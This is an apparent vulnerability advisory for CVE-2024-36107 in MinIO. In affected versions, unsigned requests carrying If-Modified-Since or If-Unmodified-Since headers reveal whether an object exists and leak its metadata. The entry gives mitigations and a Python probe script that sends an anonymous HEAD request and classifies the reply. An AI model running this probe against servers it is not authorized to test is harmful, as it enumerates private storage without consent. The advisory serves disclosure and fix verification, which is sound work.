PT-2024-5523 · Minio+2

Stefansundin · Published 2024-05-28 · Updated 2024-12-18 · CVE-2024-36107

CVSS v3.1: 5.3 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions: MinIO versions prior to RELEASE.2024-05-27T19-17-46Z
Description: MinIO evaluated the If-Modified-Since and If-Unmodified-Since conditional headers on anonymous (unsigned) object requests before it checked whether anonymous access to that object was allowed. A conditional response (304 Not Modified or 412 Precondition Failed) is only produced when the object exists, so an unauthenticated attacker can send such a request against a bucket they have no access to and learn whether a given object exists in it. The conditional response also carries the object's Last-Modified, ETag, x-amz-version-id, Expires and Cache-Control values, so those metadata values are disclosed as well. Object contents are not exposed, which is reflected in the C:L/I:N/A:N impact.
Recommendations: For MinIO versions prior to RELEASE.2024-05-27T19-17-46Z, upgrade to RELEASE.2024-05-27T19-17-46Z or later, which performs the anonymous access check before honoring the conditional headers. Until the upgrade is in place, reduce exposure by removing anonymous (public) access from buckets that do not need it, so unsigned requests are rejected before any object lookup, and, where a reverse proxy fronts MinIO, have it strip If-Modified-Since and If-Unmodified-Since from requests that carry no Authorization header or presigned query parameters. Note that it is the attacker, not the victim, who chooses to send these headers, so merely not using them in your own clients is not a mitigation.
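The probe below is an added example, not code from this advisory or from the MinIO project: it sends a single unsigned HEAD request with an If-Modified-Since date in the future (so any existing object is "not modified since" it) and classifies the reply, which is the check a practitioner would run to confirm the upgrade or workaround took effect. The endpoint, bucket and object names are placeholders you supply, and the SAMPLE_* responses are constructed for illustration, not captured from a real server. The same logic covers If-Unmodified-Since, where a date in the past yields 412 instead of 304.

```python
"""Anonymous conditional-request probe for CVE-2024-36107 in MinIO.

Added example, not code from the advisory or from the MinIO project.
Endpoint, bucket and object names are placeholders you supply; the
SAMPLE_* responses below are constructed, not captured from a real server.
"""
import sys
import urllib.error
import urllib.request
from email.utils import formatdate

# Metadata the advisory lists as returned to an anonymous caller.
LEAKED_HEADERS = ("Last-Modified", "ETag", "x-amz-version-id",
                  "Expires", "Cache-Control")

# Any existing object is "not modified since" a date in the future, so a
# server that evaluates the condition before the access check answers 304.
FUTURE_DATE = formatdate(4102444800, usegmt=True)   # Wed, 01 Jan 2100 00:00:00 GMT


def classify(status, headers):
    """Interpret one unsigned HEAD response as (verdict, leaked_metadata).

    'exists-leak': 304/412 came back, so the object exists and the
                   condition was evaluated before authorization.
    'denied':      403, the access check ran first (expected after the fix).
    'missing':     404, nothing about this key was confirmed.
    'other':       e.g. 200, the object is genuinely public; not this bug.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    leaked = {h: lower[h.lower()] for h in LEAKED_HEADERS if h.lower() in lower}
    if status in (304, 412):
        return "exists-leak", leaked
    if status == 403:
        return "denied", {}
    if status == 404:
        return "missing", {}
    return "other", leaked


def probe(endpoint, bucket, key, timeout=10):
    """Send one unsigned HEAD with If-Modified-Since and classify the reply.

    No Authorization header or presigned query string is attached, so the
    server treats the request as anonymous.
    """
    url = f"{endpoint.rstrip('/')}/{bucket}/{key}"
    req = urllib.request.Request(url, method="HEAD",
                                 headers={"If-Modified-Since": FUTURE_DATE})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, dict(resp.headers))
    except urllib.error.HTTPError as err:      # urllib raises on 304/403/404
        return classify(err.code, dict(err.headers))


# Constructed responses (not captured) showing the two outcomes.
SAMPLE_VULNERABLE = (304, {
    "Last-Modified": "Tue, 28 May 2024 10:15:00 GMT",
    "ETag": '"d41d8cd98f00b204e9800998ecf8427e"',
    "Server": "MinIO",
})
SAMPLE_FIXED = (403, {"Server": "MinIO", "Content-Type": "application/xml"})


def demo():
    """Classify the constructed samples; returns the two verdicts."""
    return classify(*SAMPLE_VULNERABLE)[0], classify(*SAMPLE_FIXED)[0]


if __name__ == "__main__":
    if len(sys.argv) == 4:
        # usage: python probe.py https://minio.example.test bucket object
        verdict, leaked = probe(*sys.argv[1:4])
        print(verdict)
        for name, value in leaked.items():
            print(f"  {name}: {value}")
    else:
        print(demo())   # ('exists-leak', 'denied')
```

Run it against a bucket that is not meant to be anonymously readable: a patched server, or one behind a proxy that strips the conditional headers from unsigned requests, answers 403 ("denied"); a 304 with Last-Modified and ETag present means the condition is still being evaluated before the access check. A 200 means the bucket is simply public and is a policy question rather than this bug.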

Exploit

Fix

Information Disclosure

Weakness Enumeration

Related Identifiers

ALT-PU-2024-16774
ALT-PU-2024-16866
ALT-PU-2024-17000
BDU:2024-06172
BIT-MINIO-2024-36107
CVE-2024-36107
GHSA-95FR-CM4M-Q5P9
GO-2024-2886

Affected Products

Alt Linux
Minio
Red Os